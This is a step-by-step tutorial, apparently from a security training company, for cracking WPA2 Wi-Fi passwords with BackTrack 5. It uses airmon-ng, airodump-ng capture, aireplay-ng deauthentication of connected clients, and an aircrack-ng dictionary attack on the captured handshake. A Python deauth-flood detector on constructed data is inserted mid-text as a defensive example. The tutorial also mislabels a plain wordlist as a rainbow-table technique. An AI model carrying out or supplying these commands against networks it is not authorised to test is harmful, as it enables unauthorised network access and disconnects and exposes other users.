
WPA2 Cracking Using BackTrack 5 Tutorial

Start BackTrack 5
Create a pwd.txt file
In that file enter the possible passwords manually (a wordlist; the original refers to this as the rainbow-table technique)
Open the console in BackTrack 5

Type the following commands in the console

To check Wi-Fi connectivity, run the command: dhclient

1> airmon-ng
This command lists the wireless interfaces in use, with their chipset and driver

2> airmon-ng start wlan0

start : to enable
wlan0 : name of the interface (which you obtained from the previous command)

This command enables the interface in monitor mode

Here the monitor-mode interface is mon0

3> airodump-ng mon0

This command gives you the BSSID and channel number of your Wi-Fi network
Copy the obtained BSSID of your network and note down its corresponding channel
number for further use

4> airodump-ng -c channel_num -w hacked --bssid bssid (paste the BSSID you obtained) mon0
(the capture file with the "hacked" prefix is created automatically; do not create it manually)

Through this command packets are captured.

Now open a new console without closing the previous one

Type the following commands in the new console

5> aireplay-ng -0 0 -a bssid_num (paste the BSSID) -c station_num (get it from the previous console) mon0

Through this command the station is forced to re-authenticate; then wait for the WPA handshake. To
confirm that the WPA handshake has taken place, refer to the previous console where you obtained the BSSID
number.
"WPA handshake" will be displayed there; if not, wait for some time.

Wegilant Net Solutions Pvt. Ltd. Website: www.wegilant.com
A3, Daffodil Building Email: info@wegilant.com
Hiranandani Gardens, Powai Landline: 022-40384200
Mumbai 76

*** For the WPA handshake to take place it is necessary that another PC or user is actively
browsing the internet on the same Wi-Fi network ***
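From the defender's side, the forced re-authentication in step 5 is the noisiest part of this procedure: a burst of deauthentication frames against one BSSID, followed by a fresh EAPOL handshake, is what a wireless IDS alerts on. The following is an added example, not part of the original tutorial, that runs a sliding-window rule over constructed frame records; the threshold, window, MAC addresses and record format are all assumptions.

```python
from collections import defaultdict, deque

# Constructed sample records, not a real capture: (timestamp_s, subtype, bssid, station).
# MAC addresses are placeholders. AP_QUIET sees two isolated deauths (normal client
# behaviour); AP_FLOODED sees a continuous stream, then the client re-associating (EAPOL).
AP_QUIET = "66:77:88:99:aa:bb"
AP_FLOODED = "00:11:22:33:44:55"
STATION = "aa:bb:cc:dd:ee:01"

def build_sample_frames():
    frames = [
        (0.0, "beacon", AP_QUIET, "ff:ff:ff:ff:ff:ff"),
        (0.0, "beacon", AP_FLOODED, "ff:ff:ff:ff:ff:ff"),
        (2.0, "deauth", AP_QUIET, STATION),
        (32.0, "deauth", AP_QUIET, STATION),
    ]
    frames += [(round(5.0 + i * 0.05, 2), "deauth", AP_FLOODED, STATION) for i in range(25)]
    frames.append((6.5, "eapol", AP_FLOODED, STATION))
    return sorted(frames)

SAMPLE_FRAMES = build_sample_frames()

def detect_deauth_floods(frames, threshold=10, window=1.0):
    """Return [(bssid, window_start, count)] once per BSSID, the first time `threshold`
    deauth frames fall inside a sliding window of `window` seconds (assumed tuning
    values). Frames must be sorted by timestamp."""
    recent = defaultdict(deque)  # bssid -> timestamps of deauth frames still in the window
    alerted, alerts = set(), []
    for ts, subtype, bssid, _station in frames:
        if subtype != "deauth":
            continue
        q = recent[bssid]
        q.append(ts)
        while ts - q[0] > window:  # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append((bssid, q[0], len(q)))
    return alerts

def handshake_after_flood(frames, alerts, grace=5.0):
    """BSSIDs where an EAPOL (4-way handshake) frame follows a flagged deauth burst within
    `grace` seconds: the signature of a forced reconnect rather than a chance disconnect."""
    flagged = {bssid: start for bssid, start, _count in alerts}
    return sorted({b for ts, sub, b, _s in frames
                   if sub == "eapol" and b in flagged and 0 <= ts - flagged[b] <= grace})

if __name__ == "__main__":
    found = detect_deauth_floods(SAMPLE_FRAMES)
    for bssid, start, count in found:
        print(f"deauth flood on {bssid}: {count} frames from t={start}s")
    print("forced reconnect suspected on:", handshake_after_flood(SAMPLE_FRAMES, found))
```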

After the WPA handshake, type the following commands in the console:

6> aircrack-ng -b bssid_num hacked-01.cap

Using this command hacked-01.cap is opened and you are asked to specify a dictionary. (Create
a dictionary for the demo with a few passwords at /pentest/passwords/passwords.lst, or create pwd.txt
with a few passwords.)

7> aircrack-ng hacked-01.cap

Using this command the packets are read, and the BSSID, ESSID and encryption type of the packets are
displayed.

8> aircrack-ng -b bssid_num -w pwd.txt hacked-01.cap

After this command the process starts; it shows how many keys have been tested and the
current passphrase/key being tried, and it stops once the correct WPA key is found.
